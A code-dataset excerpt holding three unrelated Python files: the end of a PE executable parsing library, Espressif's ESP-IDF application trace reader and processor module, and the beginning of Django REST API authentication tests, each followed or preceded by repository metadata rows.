try:
reloc_dict['Type'] = RELOCATION_TYPE[reloc.type][16:]
except KeyError:
reloc_dict['Type'] = reloc.type
return dump_dict
# OC Patch
def get_physical_by_rva(self, rva):
"""Gets the physical address in the PE file from an RVA value."""
try:
return self.get_offset_from_rva(rva)
except Exception:
return None
##
# Double-Word get / set
##
def get_data_from_dword(self, dword):
"""Return a four byte string representing the double word value. (little endian)."""
return struct.pack('<L', dword & 0xffffffff)
def get_dword_from_data(self, data, offset):
"""Convert four bytes of data to a double word (little endian)
'offset' is assumed to index into a dword array. So setting it to
N will return a dword out of the data starting at offset N*4.
Returns None if the data can't be turned into a double word.
"""
if (offset+1)*4 > len(data):
return None
return struct.unpack('<I', data[offset*4:(offset+1)*4])[0]
def get_dword_at_rva(self, rva):
"""Return the double word value at the given RVA.
Returns None if the value can't be read, i.e. the RVA can't be mapped
to a file offset.
"""
try:
return self.get_dword_from_data(self.get_data(rva, 4), 0)
except PEFormatError:
return None
def get_dword_from_offset(self, offset):
"""Return the double word value at the given file offset. (little endian)"""
if offset+4 > len(self.__data__):
return None
return self.get_dword_from_data(self.__data__[offset:offset+4], 0)
def set_dword_at_rva(self, rva, dword):
"""Set the double word value at the file offset corresponding to the given RVA."""
return self.set_bytes_at_rva(rva, self.get_data_from_dword(dword))
def set_dword_at_offset(self, offset, dword):
"""Set the double word value at the given file offset."""
return self.set_bytes_at_offset(offset, self.get_data_from_dword(dword))
##
# Word get / set
##
def get_data_from_word(self, word):
"""Return a two byte string representing the word value. (little endian)."""
return struct.pack('<H', word)
def get_word_from_data(self, data, offset):
"""Convert two bytes of data to a word (little endian)
'offset' is assumed to index into a word array. So setting it to
N will return a dword out of the data starting at offset N*2.
Returns None if the data can't be turned into a word.
"""
if (offset+1)*2 > len(data):
return None
return struct.unpack('<H', data[offset*2:(offset+1)*2])[0]
def get_word_at_rva(self, rva):
"""Return the word value at the given RVA.
Returns None if the value can't be read, i.e. the RVA can't be mapped
to a file offset.
"""
try:
return self.get_word_from_data(self.get_data(rva)[:2], 0)
except PEFormatError:
return None
def get_word_from_offset(self, offset):
"""Return the word value at the given file offset. (little endian)"""
if offset+2 > len(self.__data__):
return None
return self.get_word_from_data(self.__data__[offset:offset+2], 0)
def set_word_at_rva(self, rva, word):
"""Set the word value at the file offset corresponding to the given RVA."""
return self.set_bytes_at_rva(rva, self.get_data_from_word(word))
def set_word_at_offset(self, offset, word):
"""Set the word value at the given file offset."""
return self.set_bytes_at_offset(offset, self.get_data_from_word(word))
##
# Quad-Word get / set
##
def get_data_from_qword(self, word):
"""Return a eight byte string representing the quad-word value. (little endian)."""
return struct.pack('<Q', word)
def get_qword_from_data(self, data, offset):
"""Convert eight bytes of data to a word (little endian)
'offset' is assumed to index into a word array. So setting it to
N will return a dword out of the data starting at offset N*8.
Returns None if the data can't be turned into a quad word.
"""
if (offset+1)*8 > len(data):
return None
return struct.unpack('<Q', data[offset*8:(offset+1)*8])[0]
def get_qword_at_rva(self, rva):
"""Return the quad-word value at the given RVA.
Returns None if the value can't be read, i.e. the RVA can't be mapped
to a file offset.
"""
try:
return self.get_qword_from_data(self.get_data(rva)[:8], 0)
except PEFormatError:
return None
def get_qword_from_offset(self, offset):
"""Return the quad-word value at the given file offset. (little endian)"""
if offset+8 > len(self.__data__):
return None
return self.get_qword_from_data(self.__data__[offset:offset+8], 0)
def set_qword_at_rva(self, rva, qword):
"""Set the quad-word value at the file offset corresponding to the given RVA."""
return self.set_bytes_at_rva(rva, self.get_data_from_qword(qword))
def set_qword_at_offset(self, offset, qword):
"""Set the quad-word value at the given file offset."""
return self.set_bytes_at_offset(offset, self.get_data_from_qword(qword))
##
# Set bytes
##
def set_bytes_at_rva(self, rva, data):
"""Overwrite, with the given string, the bytes at the file offset corresponding to the given RVA.
Return True if successful, False otherwise. It can fail if the
offset is outside the file's boundaries.
"""
if not isinstance(data, str):
raise TypeError('data should be of type: str')
offset = self.get_physical_by_rva(rva)
if not offset:
return False
return self.set_bytes_at_offset(offset, data)
def set_bytes_at_offset(self, offset, data):
"""Overwrite the bytes at the given file offset with the given string.
Return True if successful, False otherwise. It can fail if the
offset is outside the file's boundaries.
"""
if not isinstance(data, str):
raise TypeError('data should be of type: str')
if offset >= 0 and offset < len(self.__data__):
self.__data__ = ( self.__data__[:offset] + data + self.__data__[offset+len(data):] )
else:
return False
return True
def merge_modified_section_data(self):
"""Update the PE image content with any individual section data that has been modified."""
for section in self.sections:
section_data_start = self.adjust_FileAlignment( section.PointerToRawData,
self.OPTIONAL_HEADER.FileAlignment )
section_data_end = section_data_start+section.SizeOfRawData
if section_data_start < len(self.__data__) and section_data_end < len(self.__data__):
self.__data__ = self.__data__[:section_data_start] + section.get_data() + self.__data__[section_data_end:]
def relocate_image(self, new_ImageBase):
"""Apply the relocation information to the image using the provided new image base.
This method will apply the relocation information to the image. Given the new base,
all the relocations will be processed and both the raw data and the section's data
will be fixed accordingly.
The resulting image can be retrieved as well through the method:
get_memory_mapped_image()
In order to get something that would more closely match what could be found in memory
once the Windows loader finished its work.
"""
relocation_difference = new_ImageBase - self.OPTIONAL_HEADER.ImageBase
for reloc in self.DIRECTORY_ENTRY_BASERELOC:
virtual_address = reloc.struct.VirtualAddress
size_of_block = reloc.struct.SizeOfBlock
# We iterate with an index because if the relocation is of type
# IMAGE_REL_BASED_HIGHADJ we need to also process the next entry
# at once and skip it for the next iteration
#
entry_idx = 0
while entry_idx<len(reloc.entries):
entry = reloc.entries[entry_idx]
entry_idx += 1
if entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_ABSOLUTE']:
# Nothing to do for this type of relocation
pass
elif entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_HIGH']:
# Fix the high 16-bits of a relocation
#
# Add high 16-bits of relocation_difference to the
# 16-bit value at RVA=entry.rva
self.set_word_at_rva(
entry.rva,
( self.get_word_at_rva(entry.rva) + relocation_difference>>16)&0xffff )
elif entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_LOW']:
# Fix the low 16-bits of a relocation
#
# Add low 16 bits of relocation_difference to the 16-bit value
# at RVA=entry.rva
self.set_word_at_rva(
entry.rva,
( self.get_word_at_rva(entry.rva) + relocation_difference)&0xffff)
elif entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_HIGHLOW']:
# Handle all high and low parts of a 32-bit relocation
#
# Add relocation_difference to the value at RVA=entry.rva
self.set_dword_at_rva(
entry.rva,
self.get_dword_at_rva(entry.rva)+relocation_difference)
elif entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_HIGHADJ']:
# Fix the high 16-bits of a relocation and adjust
#
# Add high 16-bits of relocation_difference to the 32-bit value
# composed from the (16-bit value at RVA=entry.rva)<<16 plus
# the 16-bit value at the next relocation entry.
#
# If the next entry is beyond the array's limits,
# abort... the table is corrupt
#
if entry_idx == len(reloc.entries):
break
next_entry = reloc.entries[entry_idx]
entry_idx += 1
self.set_word_at_rva( entry.rva,
((self.get_word_at_rva(entry.rva)<<16) + next_entry.rva +
relocation_difference & 0xffff0000) >> 16 )
elif entry.type == RELOCATION_TYPE['IMAGE_REL_BASED_DIR64']:
# Apply the difference to the 64-bit value at the offset
# RVA=entry.rva
self.set_qword_at_rva(
entry.rva,
self.get_qword_at_rva(entry.rva) + relocation_difference)
def verify_checksum(self):
return self.OPTIONAL_HEADER.CheckSum == self.generate_checksum()
def generate_checksum(self):
# This will make sure that the data representing the PE image
# is updated with any changes that might have been made by
# assigning values to header fields as those are not automatically
# updated upon assignment.
#
self.__data__ = self.write()
# Get the offset to the CheckSum field in the OptionalHeader
#
checksum_offset = self.OPTIONAL_HEADER.__file_offset__ + 0x40 # 64
checksum = 0
# Verify the data is dword-aligned. Add padding if needed
#
remainder = len(self.__data__) % 4
data_len = len(self.__data__) + ((4-remainder) * ( remainder != 0 ))
for i in xrange( data_len / 4 ):
# Skip the checksum field
if i == checksum_offset / 4:
continue
if i+1 == (data_len / 4) and remainder:
dword = struct.unpack('I', self.__data__[i*4:]+ ('\0' * (4-remainder)) )[0]
else:
dword = struct.unpack('I', self.__data__[ i*4 : i*4+4 ])[0]
# Optimized the calculation (thanks to Emmanuel Bourg for pointing it out!)
checksum += dword
if checksum > 2**32:
checksum = (checksum & 0xffffffff) + (checksum >> 32)
checksum = (checksum & 0xffff) + (checksum >> 16)
checksum = (checksum) + (checksum >> 16)
checksum = checksum & 0xffff
# The length is the one of the original data, not the padded one
#
return checksum + len(self.__data__)
def is_exe(self):
"""Check whether the file is a standard executable.
This will return true only if the file has the IMAGE_FILE_EXECUTABLE_IMAGE flag set
and the IMAGE_FILE_DLL not set and the file does not appear to be a driver either.
"""
EXE_flag = IMAGE_CHARACTERISTICS['IMAGE_FILE_EXECUTABLE_IMAGE']
if (not self.is_dll()) and (not self.is_driver()) and (
EXE_flag & self.FILE_HEADER.Characteristics) == EXE_flag:
return True
return False
def is_dll(self):
"""Check whether the file is a standard DLL.
This will return true only if the image has the IMAGE_FILE_DLL flag set.
"""
DLL_flag = IMAGE_CHARACTERISTICS['IMAGE_FILE_DLL']
if ( DLL_flag & self.FILE_HEADER.Characteristics) == DLL_flag:
return True
return False
def is_driver(self):
"""Check whether the file is a Windows driver.
This will return true only if there are reliable indicators of the image
being a driver.
"""
# Checking that the ImageBase field of the OptionalHeader is above or
# equal to 0x80000000 (that is, whether it lies in the upper 2GB of
# the address space, normally belonging to the kernel) is not a
# reliable enough indicator. For instance, PEs that play the invalid
# ImageBase trick to get relocated could be incorrectly assumed to be
# drivers.
# This is not reliable either...
#
# if any( (section.Characteristics & SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_NOT_PAGED']) for section in self.sections ):
# return True
if hasattr(self, 'DIRECTORY_ENTRY_IMPORT'):
# If it imports from "ntoskrnl.exe" or other kernel components it should be a driver
#
if set( ('ntoskrnl.exe', 'hal.dll', 'ndis.sys', 'bootvid.dll', 'kdcom.dll' ) ).intersection( [ imp.dll.lower() for imp in self.DIRECTORY_ENTRY_IMPORT ] ):
return True
return False
def get_overlay_data_start_offset(self):
"""Get the offset of data appended to the file and not contained within the area described in the headers."""
largest_offset_and_size = (0, 0)
def update_if_sum_is_larger_and_within_file(offset_and_size, file_size=len(self.__data__)):
if sum(offset_and_size) <= file_size and sum(offset_and_size) > sum(largest_offset_and_size):
return offset_and_size
return largest_offset_and_size
if hasattr(self, 'OPTIONAL_HEADER'):
largest_offset_and_size = update_if_sum_is_larger_and_within_file(
(self.OPTIONAL_HEADER.get_file_offset(), self.FILE_HEADER.SizeOfOptionalHeader))
for section in self.sections:
largest_offset_and_size = update_if_sum_is_larger_and_within_file(
(section.PointerToRawData, section.SizeOfRawData))
for directory in self.OPTIONAL_HEADER.DATA_DIRECTORY:
largest_offset_and_size = update_if_sum_is_larger_and_within_file(
(directory.VirtualAddress, directory.Size))
if len(self.__data__) > sum(largest_offset_and_size):
return sum(largest_offset_and_size)
return None
def get_overlay(self):
"""Get the data appended to the file and not contained within the area described in the headers."""
overlay_data_offset = self.get_overlay_data_start_offset()
if overlay_data_offset is not None:
return self.__data__[ overlay_data_offset : ]
return None
def trim(self):
"""Return the just data defined by the PE headers, removing any overlayed data."""
overlay_data_offset = self.get_overlay_data_start_offset()
if overlay_data_offset is not None:
return self.__data__[ : overlay_data_offset ]
return self.__data__[:]
# According to http://corkami.blogspot.com/2010/01/parce-que-la-planche-aura-brule.html
# if PointerToRawData is less that 0x200 it's rounded to zero. Loading the test file
# in a debugger it's easy to verify that the PointerToRawData value of 1 is rounded
# to zero. Hence we reproduce the behavior
#
# According to the document:
# [ Microsoft Portable Executable and Common Object File Format Specification ]
# "The alignment factor (in bytes) that is used to align the raw data of sections in
# the image file. The value should be a power of 2 between 512 and 64 K, inclusive.
# The default is 512. If the SectionAlignment is less than the architecture's page
# size, then FileAlignment must match SectionAlignment."
#
# The following is a hard-coded constant if the Windows loader
def adjust_FileAlignment( self, val, file_alignment ):
global FileAlignment_Warning
if file_alignment > FILE_ALIGNEMNT_HARDCODED_VALUE:
# If it's not a power of two, report it:
if not power_of_two(file_alignment) and FileAlignment_Warning is False:
self.__warnings.append(
'If FileAlignment > 0x200 it should be a power of 2. Value: %x' % (
file_alignment) )
FileAlignment_Warning = True
if file_alignment < FILE_ALIGNEMNT_HARDCODED_VALUE:
return val
return (val / 0x200) * 0x200
# According to the document:
# [ Microsoft Portable Executable and Common Object File Format Specification ]
# "The alignment (in bytes) of sections when they are loaded into memory. It must be
# greater than or equal to FileAlignment. The default is the page size for the
# architecture."
#
def adjust_SectionAlignment( self, val, section_alignment, file_alignment ):
global SectionAlignment_Warning
if file_alignment < FILE_ALIGNEMNT_HARDCODED_VALUE:
if file_alignment != section_alignment and SectionAlignment_Warning is False:
self.__warnings.append(
'If FileAlignment(%x) < 0x200 it should equal SectionAlignment(%x)' % (
file_alignment, section_alignment) )
SectionAlignment_Warning = True
if section_alignment < 0x1000: # page size
section_alignment = file_alignment
# 0x200 is the minimum valid FileAlignment according to the documentation
# although ntoskrnl.exe has an alignment of 0x80 in some Windows versions
#
#elif section_alignment < 0x80:
# section_alignment = 0x80
if section_alignment and val % section_alignment:
return section_alignment * ( val / section_alignment )
return val
| 38.602235 | 166 | 0.574339 |
4ffe947d13be2de9e9b05205409a3e14f4ef137f | 21,494 | py | Python | tools/esp_app_trace/espytrace/apptrace.py | dreamcmi/esp-idf | 2024ae943466a967f48607c3bd9c258526f08b10 | [
"Apache-2.0"
] | null | null | null | tools/esp_app_trace/espytrace/apptrace.py | dreamcmi/esp-idf | 2024ae943466a967f48607c3bd9c258526f08b10 | [
"Apache-2.0"
] | null | null | null | tools/esp_app_trace/espytrace/apptrace.py | dreamcmi/esp-idf | 2024ae943466a967f48607c3bd9c258526f08b10 | [
"Apache-2.0"
] | null | null | null | # SPDX-FileCopyrightText: 2022 Espressif Systems (Shanghai) CO LTD
# SPDX-License-Identifier: Apache-2.0
from __future__ import print_function
import os
import sys
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
import os.path
import socketserver as SocketServer
import subprocess
import tempfile
import threading
import time
import elftools.elf.constants as elfconst
import elftools.elf.elffile as elffile
def clock():
if sys.version_info >= (3, 3):
return time.process_time()
else:
return time.clock()
def addr2line(toolchain, elf_path, addr):
"""
Creates trace reader.
Parameters
----------
toolchain : string
toolchain prefix to retrieve source line locations using addresses
elf_path : string
path to ELF file to use
addr : int
address to retrieve source line location
Returns
-------
string
source line location string
"""
try:
return subprocess.check_output(['%saddr2line' % toolchain, '-e', elf_path, '0x%x' % addr]).decode('utf-8')
except subprocess.CalledProcessError:
return ''
class ParseError(RuntimeError):
"""
Parse error exception
"""
def __init__(self, message):
RuntimeError.__init__(self, message)
class ReaderError(RuntimeError):
"""
Trace reader error exception
"""
def __init__(self, message):
RuntimeError.__init__(self, message)
class ReaderTimeoutError(ReaderError):
"""
Trace reader timeout error
"""
def __init__(self, tmo, sz):
ReaderError.__init__(self, 'Timeout %f sec while reading %d bytes!' % (tmo, sz))
class ReaderShutdownRequest(ReaderError):
"""
Trace reader shutdown request error
Raised when user presses CTRL+C (SIGINT).
"""
def __init__(self):
ReaderError.__init__(self, 'Shutdown request!')
class Reader:
"""
Base abstract reader class
"""
def __init__(self, tmo):
"""
Constructor
Parameters
----------
tmo : int
read timeout
"""
self.timeout = tmo
self.need_stop = False
def read(self, sz):
"""
Reads a number of bytes
Parameters
----------
sz : int
number of bytes to read
Returns
-------
bytes object
read bytes
Returns
-------
ReaderTimeoutError
if timeout expires
ReaderShutdownRequest
if SIGINT was received during reading
"""
pass
def readline(self):
"""
Reads line
Parameters
----------
sz : int
number of bytes to read
Returns
-------
string
read line
"""
pass
def forward(self, sz):
"""
Moves read pointer to a number of bytes
Parameters
----------
sz : int
number of bytes to read
"""
pass
def cleanup(self):
"""
Cleans up reader
"""
self.need_stop = True
class FileReader(Reader):
"""
File reader class
"""
def __init__(self, path, tmo):
"""
Constructor
Parameters
----------
path : string
path to file to read
tmo : int
see Reader.__init__()
"""
Reader.__init__(self, tmo)
self.trace_file_path = path
self.trace_file = open(path, 'rb')
def read(self, sz):
"""
see Reader.read()
"""
data = b''
start_tm = clock()
while not self.need_stop:
data += self.trace_file.read(sz - len(data))
if len(data) == sz:
break
if self.timeout != -1 and clock() >= start_tm + self.timeout:
raise ReaderTimeoutError(self.timeout, sz)
if self.need_stop:
raise ReaderShutdownRequest()
return data
def get_pos(self):
"""
Retrieves current file read position
Returns
-------
int
read position
"""
return self.trace_file.tell()
def readline(self, linesep=os.linesep):
"""
see Reader.read()
"""
line = ''
start_tm = clock()
while not self.need_stop:
line += self.trace_file.readline().decode('utf-8')
if line.endswith(linesep):
break
if self.timeout != -1 and clock() >= start_tm + self.timeout:
raise ReaderTimeoutError(self.timeout, 1)
if self.need_stop:
raise ReaderShutdownRequest()
return line
def forward(self, sz):
"""
see Reader.read()
"""
cur_pos = self.trace_file.tell()
start_tm = clock()
while not self.need_stop:
file_sz = os.path.getsize(self.trace_file_path)
if file_sz - cur_pos >= sz:
break
if self.timeout != -1 and clock() >= start_tm + self.timeout:
raise ReaderTimeoutError(self.timeout, sz)
if self.need_stop:
raise ReaderShutdownRequest()
self.trace_file.seek(sz, os.SEEK_CUR)
class NetRequestHandler:
"""
Handler for incoming network requests (connections, datagrams)
"""
def handle(self):
while not self.server.need_stop:
data = self.rfile.read(1024)
if len(data) == 0:
break
self.server.wtrace.write(data)
self.server.wtrace.flush()
class NetReader(FileReader):
"""
Base netwoek socket reader class
"""
def __init__(self, tmo):
"""
see Reader.__init__()
"""
fhnd,fname = tempfile.mkstemp()
FileReader.__init__(self, fname, tmo)
self.wtrace = os.fdopen(fhnd, 'wb')
self.server_thread = threading.Thread(target=self.serve_forever)
self.server_thread.start()
def cleanup(self):
"""
see Reader.cleanup()
"""
FileReader.cleanup(self)
self.shutdown()
self.server_close()
self.server_thread.join()
time.sleep(0.1)
self.trace_file.close()
self.wtrace.close()
class TCPRequestHandler(NetRequestHandler, SocketServer.StreamRequestHandler):
"""
Handler for incoming TCP connections
"""
pass
class TCPReader(NetReader, SocketServer.TCPServer):
"""
TCP socket reader class
"""
def __init__(self, host, port, tmo):
"""
Constructor
Parameters
----------
host : string
see SocketServer.BaseServer.__init__()
port : int
see SocketServer.BaseServer.__init__()
tmo : int
see Reader.__init__()
"""
SocketServer.TCPServer.__init__(self, (host, port), TCPRequestHandler)
NetReader.__init__(self, tmo)
class UDPRequestHandler(NetRequestHandler, SocketServer.DatagramRequestHandler):
"""
Handler for incoming UDP datagrams
"""
pass
class UDPReader(NetReader, SocketServer.UDPServer):
"""
UDP socket reader class
"""
def __init__(self, host, port, tmo):
"""
Constructor
Parameters
----------
host : string
see SocketServer.BaseServer.__init__()
port : int
see SocketServer.BaseServer.__init__()
tmo : int
see Reader.__init__()
"""
SocketServer.UDPServer.__init__(self, (host, port), UDPRequestHandler)
NetReader.__init__(self, tmo)
def reader_create(trc_src, tmo):
"""
Creates trace reader.
Parameters
----------
trc_src : string
trace source URL. Supports 'file:///path/to/file' or (tcp|udp)://host:port
tmo : int
read timeout
Returns
-------
Reader
reader object or None if URL scheme is not supported
"""
url = urlparse(trc_src)
if len(url.scheme) == 0 or url.scheme == 'file':
if os.name == 'nt':
# workaround for Windows path
return FileReader(trc_src[7:], tmo)
else:
return FileReader(url.path, tmo)
if url.scheme == 'tcp':
return TCPReader(url.hostname, url.port, tmo)
if url.scheme == 'udp':
return UDPReader(url.hostname, url.port, tmo)
return None
class TraceEvent:
"""
Base class for all trace events.
"""
def __init__(self, name, core_id, evt_id):
self.name = name
self.ctx_name = 'None'
self.in_irq = False
self.core_id = core_id
self.id = evt_id
self.ts = 0
self.params = {}
@property
def ctx_desc(self):
if self.in_irq:
return 'IRQ "%s"' % self.ctx_name
return 'task "%s"' % self.ctx_name
def to_jsonable(self):
res = self.__dict__
params = {}
for p in self.params:
params.update(self.params[p].to_jsonable())
res['params'] = params
return res
class TraceDataProcessor:
"""
Base abstract class for all trace data processors.
"""
def __init__(self, print_events, keep_all_events=False):
"""
Constructor.
Parameters
----------
print_events : bool
if True every event will be printed as they arrive
keep_all_events : bool
if True all events will be kept in self.events in the order they arrive
"""
self.print_events = print_events
self.keep_all_events = keep_all_events
self.total_events = 0
self.events = []
# This can be changed by the root procesor that includes several sub-processors.
# It is used access some method of root processor which can contain methods/data common for all sub-processors.
# Common info could be current execution context, info about running tasks, available IRQs etc.
self.root_proc = self
def _print_event(self, event):
"""
Base method to print an event.
Parameters
----------
event : object
Event object
"""
print('EVENT[{:d}]: {}'.format(self.total_events, event))
def print_report(self):
"""
Base method to print report.
"""
print('Processed {:d} events'.format(self.total_events))
def cleanup(self):
"""
Base method to make cleanups.
"""
pass
def on_new_event(self, event):
"""
Base method to process event.
"""
if self.print_events:
self._print_event(event)
if self.keep_all_events:
self.events.append(event)
self.total_events += 1
class LogTraceParseError(ParseError):
"""
Log trace parse error exception.
"""
pass
def get_str_from_elf(felf, str_addr):
"""
Retrieves string from ELF file.
Parameters
----------
felf : elffile.ELFFile
open ELF file handle to retrive format string from
str_addr : int
address of the string
Returns
-------
string
string or None if it was not found
"""
tgt_str = ''
for sect in felf.iter_sections():
if sect['sh_addr'] == 0 or (sect['sh_flags'] & elfconst.SH_FLAGS.SHF_ALLOC) == 0:
continue
if str_addr < sect['sh_addr'] or str_addr >= sect['sh_addr'] + sect['sh_size']:
continue
sec_data = sect.data()
for i in range(str_addr - sect['sh_addr'], sect['sh_size']):
if type(sec_data) is str:
ch = sec_data[i]
else:
ch = str(chr(sec_data[i]))
if ch == '\0':
break
tgt_str += ch
if len(tgt_str) > 0:
return tgt_str
return None
class LogTraceEvent:
"""
Log trace event.
"""
def __init__(self, fmt_addr, log_args):
"""
Constructor.
Parameters
----------
fmt_addr : int
address of the format string
log_args : list
list of log message arguments
"""
self.fmt_addr = fmt_addr
self.args = log_args
def get_message(self, felf):
"""
Retrieves log message.
Parameters
----------
felf : elffile.ELFFile
open ELF file handle to retrive format string from
Returns
-------
string
formatted log message
Raises
------
LogTraceParseError
if format string has not been found in ELF file
"""
fmt_str = get_str_from_elf(felf, self.fmt_addr)
if not fmt_str:
raise LogTraceParseError('Failed to find format string for 0x%x' % self.fmt_addr)
prcnt_idx = 0
for i, arg in enumerate(self.args):
prcnt_idx = fmt_str.find('%', prcnt_idx, -2) # TODO: check str ending with %
if prcnt_idx == -1:
break
prcnt_idx += 1 # goto next char
if fmt_str[prcnt_idx] == 's':
# find string
arg_str = get_str_from_elf(felf, self.args[i])
if arg_str:
self.args[i] = arg_str
else:
self.args[i] = '<None>'
fmt_str = fmt_str.replace('%p', '%x')
return fmt_str % tuple(self.args)
class BaseLogTraceDataProcessorImpl:
"""
Base implementation for log data processors.
"""
def __init__(self, print_log_events=False, elf_path=''):
"""
Constructor.
Parameters
----------
print_log_events : bool
if True every log event will be printed as they arrive
elf_path : string
path to ELF file to retrieve format strings for log messages
"""
if len(elf_path):
self.felf = elffile.ELFFile(open(elf_path, 'rb'))
else:
self.felf = None
self.print_log_events = print_log_events
self.messages = []
def cleanup(self):
"""
Cleanup
"""
if self.felf:
self.felf.stream.close()
def print_report(self):
"""
Prints log report
"""
print('=============== LOG TRACE REPORT ===============')
print('Processed {:d} log messages.'.format(len(self.messages)))
def on_new_event(self, event):
"""
Processes log events.
Parameters
----------
event : LogTraceEvent
Event object.
"""
msg = event.get_message(self.felf)
self.messages.append(msg)
if self.print_log_events:
print(msg, end='')
class HeapTraceParseError(ParseError):
"""
Heap trace parse error exception.
"""
pass
class HeapTraceDuplicateAllocError(HeapTraceParseError):
"""
Heap trace duplicate allocation error exception.
"""
def __init__(self, addr, new_size, prev_size):
"""
Constructor.
Parameters
----------
addr : int
memory block address
new_size : int
size of the new allocation
prev_size : int
size of the previous allocation
"""
HeapTraceParseError.__init__(self, """Duplicate alloc @ 0x{:x}!
New alloc is {:d} bytes,
previous is {:d} bytes.""".format(addr, new_size, prev_size))
class HeapTraceEvent:
"""
Heap trace event.
"""
def __init__(self, trace_event, alloc, toolchain='', elf_path=''):
"""
Constructor.
Parameters
----------
sys_view_event : TraceEvent
trace event object related to this heap event
alloc : bool
True for allocation event, otherwise False
toolchain_pref : string
toolchain prefix to retrieve source line locations using addresses
elf_path : string
path to ELF file to retrieve format strings for log messages
"""
self.trace_event = trace_event
self.alloc = alloc
self.toolchain = toolchain
self.elf_path = elf_path
if self.alloc:
self.size = self.trace_event.params['size'].value
else:
self.size = None
@property
def addr(self):
return self.trace_event.params['addr'].value
@property
def callers(self):
return self.trace_event.params['callers'].value
def __repr__(self):
if len(self.toolchain) and len(self.elf_path):
callers = os.linesep
for addr in self.trace_event.params['callers'].value:
if addr == 0:
break
callers += '{}'.format(addr2line(self.toolchain, self.elf_path, addr))
else:
callers = ''
for addr in self.trace_event.params['callers'].value:
if addr == 0:
break
if len(callers):
callers += ':'
callers += '0x{:x}'.format(addr)
if self.alloc:
return '[{:.9f}] HEAP: Allocated {:d} bytes @ 0x{:x} from {} on core {:d} by: {}'.format(self.trace_event.ts,
self.size, self.addr,
self.trace_event.ctx_desc,
self.trace_event.core_id,
callers)
else:
return '[{:.9f}] HEAP: Freed bytes @ 0x{:x} from {} on core {:d} by: {}'.format(self.trace_event.ts,
self.addr, self.trace_event.ctx_desc,
self.trace_event.core_id, callers)
class BaseHeapTraceDataProcessorImpl:
"""
Base implementation for heap data processors.
"""
def __init__(self, print_heap_events=False):
"""
Constructor.
Parameters
----------
print_heap_events : bool
if True every heap event will be printed as they arrive
"""
self._alloc_addrs = {}
self.allocs = []
self.frees = []
self.heap_events_count = 0
self.print_heap_events = print_heap_events
def on_new_event(self, event):
"""
Processes heap events. Keeps track of active allocations list.
Parameters
----------
event : HeapTraceEvent
Event object.
"""
self.heap_events_count += 1
if self.print_heap_events:
print(event)
if event.alloc:
if event.addr in self._alloc_addrs:
raise HeapTraceDuplicateAllocError(event.addr, event.size, self._alloc_addrs[event.addr].size)
self.allocs.append(event)
self._alloc_addrs[event.addr] = event
else:
# do not treat free on unknown addresses as errors, because these blocks coould be allocated when tracing was disabled
if event.addr in self._alloc_addrs:
event.size = self._alloc_addrs[event.addr].size
self.allocs.remove(self._alloc_addrs[event.addr])
del self._alloc_addrs[event.addr]
else:
self.frees.append(event)
def print_report(self):
"""
Prints heap report
"""
print('=============== HEAP TRACE REPORT ===============')
print('Processed {:d} heap events.'.format(self.heap_events_count))
if len(self.allocs) == 0:
print('OK - Heap errors was not found.')
return
leaked_bytes = 0
for alloc in self.allocs:
leaked_bytes += alloc.size
print(alloc)
for free in self.frees:
if free.addr > alloc.addr and free.addr <= alloc.addr + alloc.size:
print('Possible wrong free operation found')
print(free)
print('Found {:d} leaked bytes in {:d} blocks.'.format(leaked_bytes, len(self.allocs)))
| 28.356201 | 130 | 0.513911 |
a0cee9287f2381c26acad42998008b4e3c29ce3a | 7,622 | py | Python | projects/tests.py | dymaxionlabs/analytics-backend | fb801b184e4e510d54e8addb283fd202c9dfe7b1 | [
"BSD-3-Clause"
] | null | null | null | projects/tests.py | dymaxionlabs/analytics-backend | fb801b184e4e510d54e8addb283fd202c9dfe7b1 | [
"BSD-3-Clause"
] | 1 | 2022-01-21T20:07:50.000Z | 2022-01-21T20:07:50.000Z | projects/tests.py | dymaxionlabs/analytics-backend | fb801b184e4e510d54e8addb283fd202c9dfe7b1 | [
"BSD-3-Clause"
] | null | null | null | from django.contrib.auth.models import User
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APIClient, APITestCase
from projects.models import Project, ProjectInvitationToken
def loginWithAPI(client, username, password):
response = client.post('/auth/login/',
dict(username=username, password=password))
if response.status_code != 200 or 'key' not in response.data:
raise RuntimeError('Login failed in test. Status code {}'.format(
response.status_code))
token = response.data['key']
# Set Authorization header with Token
client.credentials(HTTP_AUTHORIZATION=token)
return token
class LoginViewTest(TestCase):
def setUp(self):
self.test_user = User(email="test@prueba.com", username='test')
self.test_user.set_password('secret')
self.test_user.save()
self.client = APIClient()
def test_login_ok(self):
response = self.client.post(
'/auth/login/', {
'username': 'test',
'password': 'secret'
},
format='json')
self.assertEquals(200, response.status_code)
self.assertTrue('key' in response.data)
def test_login_fail(self):
response = self.client.post(
'/auth/login/', {
'username': 'test',
'password': 'bad_password'
},
format='json')
self.assertEquals(400, response.status_code)
self.assertEquals(["Unable to log in with provided credentials."],
response.data['non_field_errors'])
class LogoutViewTest(TestCase):
def setUp(self):
self.test_user = User(email="test@prueba.com", username='test')
self.test_user.set_password('secret')
self.test_user.save()
self.client = APIClient()
def test_logout_ok(self):
loginWithAPI(self.client, username='test', password='secret')
response = self.client.post('/auth/logout/', {}, format='json')
self.assertEqual(200, response.status_code)
self.assertEqual({'detail': 'Successfully logged out.'}, response.data)
def test_logout_invalid_token(self):
self.client.credentials(HTTP_AUTHORIZATION='foobar')
response = self.client.post('/auth/logout/', format='json')
self.assertEqual(401, response.status_code)
self.assertEquals("Invalid token.", response.data['detail'])
class UserViewSetTest(APITestCase):
def setUp(self):
self.user = User(email='user@test.com', username='user')
self.user.set_password('secret')
self.user.save()
self.admin_user = User(
email='admin@test.com', username='admin', is_staff=True)
self.admin_user.set_password('secret')
self.admin_user.save()
def test_user_list_only_shows_logged_in_user(self):
loginWithAPI(self.client, 'user', 'secret')
url = reverse('user-list')
response = self.client.get(url, {}, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual([{
'username': 'user',
'email': 'user@test.com',
'first_name': '',
'last_name': ''
}], response.data['results'])
def test_user_list_shows_all_if_admin(self):
loginWithAPI(self.client, 'admin', 'secret')
url = reverse('user-list')
response = self.client.get(url, {}, format='json')
